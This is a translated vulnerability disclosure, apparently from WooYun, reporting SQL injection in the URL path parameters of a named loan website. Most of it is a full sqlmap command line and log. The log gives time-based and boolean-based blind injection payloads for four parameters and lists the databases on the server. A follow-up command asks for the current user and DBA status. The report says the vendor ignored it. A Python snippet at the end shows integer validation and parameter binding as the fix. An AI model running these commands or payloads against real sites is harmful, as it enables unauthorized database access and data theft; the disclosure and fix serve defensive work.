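2015-11-05: Details reported to the vendor; waiting for the vendor to handle them
2015-11-10: The vendor actively ignored the vulnerability; details disclosed to the public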
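I searched, and these have not been submitted before, right? This won't turn out to be yet another duplicate ID? I have lost confidence in submitting for this site! ~~~Multiple parameters have injection points!~~~
Address: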
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 10 --dbms "MySQL"
The numbers after money, deadline, lt and co_id are injectable. sqlmap test:
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[00:21:43] [INFO] testing connection to the target URL
[00:21:48] [INFO] testing if the target URL is stable. This can take a couple of seconds
[00:21:53] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[00:21:55] [INFO] testing if URI parameter '#1*' is dynamic
[00:21:59] [WARNING] URI parameter '#1*' does not appear dynamic
[00:22:04] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[00:22:04] [INFO] testing for SQL injection on URI parameter '#1*'
[00:22:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:23:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:23:58] [INFO] testing 'MySQL inline queries'
[00:24:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:02] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:24:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:31:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:37:26] [WARNING] URI parameter '#1*' is not injectable
[00:37:26] [INFO] testing if URI parameter '#2*' is dynamic
[00:37:31] [INFO] confirming that URI parameter '#2*' is dynamic
[00:37:35] [INFO] URI parameter '#2*' is dynamic
[00:37:36] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable
[00:37:36] [INFO] testing for SQL injection on URI parameter '#2*'
[00:37:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:37:38] [WARNING] reflective value(s) found and filtering out
[00:38:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:38:15] [INFO] testing 'MySQL inline queries'
[00:38:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:38:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:39:31] [INFO] URI parameter '#2*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[00:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:39:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:40:26] [INFO] checking if the injection point on URI parameter '#2*' is a false positive
URI parameter '#2*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[00:43:18] [INFO] testing if URI parameter '#3*' is dynamic
[00:43:23] [INFO] confirming that URI parameter '#3*' is dynamic
[00:43:28] [INFO] URI parameter '#3*' is dynamic
[00:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#3*' might not be injectable
[00:43:29] [INFO] testing for SQL injection on URI parameter '#3*'
[00:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:44:10] [INFO] testing 'MySQL inline queries'
[00:44:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:44:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:45:25] [INFO] URI parameter '#3*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[00:45:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:46:18] [INFO] checking if the injection point on URI parameter '#3*' is a false positive
URI parameter '#3*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[00:54:38] [INFO] testing if URI parameter '#4*' is dynamic
[00:54:42] [INFO] confirming that URI parameter '#4*' is dynamic
[00:54:47] [INFO] URI parameter '#4*' is dynamic
[00:54:48] [WARNING] heuristic (basic) test shows that URI parameter '#4*' might not be injectable
[00:54:48] [INFO] testing for SQL injection on URI parameter '#4*'
[00:54:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:08] [INFO] URI parameter '#4*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:55:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:55:09] [INFO] testing 'MySQL inline queries'
[00:55:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:55:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:56:15] [INFO] URI parameter '#4*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[00:56:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#4*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[00:58:24] [INFO] testing if URI parameter '#5*' is dynamic
[00:58:31] [INFO] confirming that URI parameter '#5*' is dynamic
[00:58:36] [INFO] URI parameter '#5*' is dynamic
[00:58:43] [WARNING] heuristic (basic) test shows that URI parameter '#5*' might not be injectable
[00:58:43] [INFO] testing for SQL injection on URI parameter '#5*'
[00:58:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:59:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:59:56] [INFO] testing 'MySQL inline queries'
[01:00:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:00:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:01:16] [INFO] URI parameter '#5*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[01:01:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:01:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:02:09] [INFO] checking if the injection point on URI parameter '#5*' is a false positive
URI parameter '#5*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 470 HTTP(s) requests:
---
Place: URI
Parameter: #2*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1 AND SLEEP(5)/deadline/3/lt/1/co_id/1

Place: URI
Parameter: #5*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1/co_id/1 AND SLEEP(5)

Place: URI
Parameter: #4*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1 AND 4532=4532/co_id/1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1 AND SLEEP(5)/co_id/1

Place: URI
Parameter: #3*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3 AND SLEEP(5)/lt/1/co_id/1
---
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #3*, type: Unescaped numeric
[2] place: URI, parameter: #4*, type: Unescaped numeric
[3] place: URI, parameter: #5*, type: Unescaped numeric
[q] Quit
> 0
[01:06:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
available databases [8]:
[*] daimayi
[*] huomayi
[*] information_schema
[*] mayishequ
[*] mysql
[*] myxd
[*] performance_schema
[*] test
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 1 --dbms "MySQL" --current-db --current-user --is-dba --time-sec 60
Because this is time-delay injection, it is really too slow, so I did not continue!
As above
Fix by filtering
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-10 08:56
Vulnerability Rank: 4 (WooYun rating)
None yet
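
The sqlmap output above classifies every finding as "Unescaped numeric": the values in the `/money/…/deadline/…/lt/…/co_id/…` path segments reach the SQL statement as raw text. The following is an added example of the corresponding fix, not code from the report or from the site: each path value is validated as a plain integer and then bound as a query parameter. It assumes the path after `index.php` has already been URL-decoded; the `loan` table, its columns and the query are hypothetical, and `sqlite3` stands in for MySQL so the block runs offline.

```python
import re
import sqlite3

# Parameters the report lists in the path; all are expected to be plain integers.
NUMERIC_PARAMS = ("s", "money", "deadline", "lt", "co_id")
_INT = re.compile(r"[0-9]{1,9}")  # ASCII digits only, bounded length


def parse_path_params(path_info):
    """Split '/Loan/index/k1/v1/k2/v2/...' into a dict of validated ints."""
    parts = [p for p in path_info.split("/") if p]
    pairs = parts[2:]                      # skip controller and action
    if len(pairs) % 2:
        raise ValueError("unpaired path segment")
    params = {}
    for key, value in zip(pairs[0::2], pairs[1::2]):
        if key not in NUMERIC_PARAMS:
            raise ValueError(f"unexpected parameter: {key!r}")
        if not _INT.fullmatch(value):      # rejects '1 AND SLEEP(5)', '1*', '-1'
            raise ValueError(f"non-numeric value for {key!r}")
        params[key] = int(value)
    return params


def find_loans(conn, path_info):
    """Validated ints are still bound as parameters, never concatenated."""
    p = parse_path_params(path_info)
    # Hypothetical query: the application's real SQL is not on the page.
    sql = ("SELECT id FROM loan WHERE money >= ? AND deadline <= ? "
           "AND lt = ? AND co_id = ? ORDER BY id")
    args = (p.get("money", 0), p.get("deadline", 0),
            p.get("lt", 0), p.get("co_id", 0))
    return [row[0] for row in conn.execute(sql, args)]


def demo_db():
    """Constructed in-memory table with three sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE loan (id INTEGER, money INTEGER, "
                 "deadline INTEGER, lt INTEGER, co_id INTEGER)")
    conn.executemany("INSERT INTO loan VALUES (?,?,?,?,?)",
                     [(1, 5, 3, 1, 1), (2, 1, 2, 1, 1), (3, 9, 3, 2, 1)])
    return conn
```

Rejecting the request outright (an HTTP 400 in a real handler) also gives the application a clear event to log and alert on.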